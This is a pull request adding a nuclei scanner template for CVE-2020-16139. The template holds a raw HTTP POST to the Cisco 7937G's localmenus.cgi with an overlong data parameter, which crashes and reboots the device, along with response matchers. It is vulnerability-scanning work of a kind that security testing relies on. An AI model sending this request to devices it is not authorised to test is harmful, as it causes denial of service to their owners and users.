### PR TITLE
Adding CVE-2020-16139

### DIFF
--- a/cves/2020/CVE-2020-16139.yaml
+++ b/cves/2020/CVE-2020-16139.yaml
@@ -1,0 +1,28 @@
+id: CVE-2020-16139
+
+info:
+  name: Cisco 7937G Denial-of-Service Reboot Attack
+  author: pikpikcu
+  severity: low
+  reference: https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/
+  tags: cve,cve2020,dos,cisco
+
+requests:
+  - raw:
+      - |
+        POST /localmenus.cgi?func=609&rphl=1&data=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: header
+        words:
+          - "application/xml"
+      - type: word
+        words:
+          - 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'


### PR DESCRIPTION
Adding CVE-2020-16139 back as now templates with **dos** tags is excluded as default within the nuclei engine.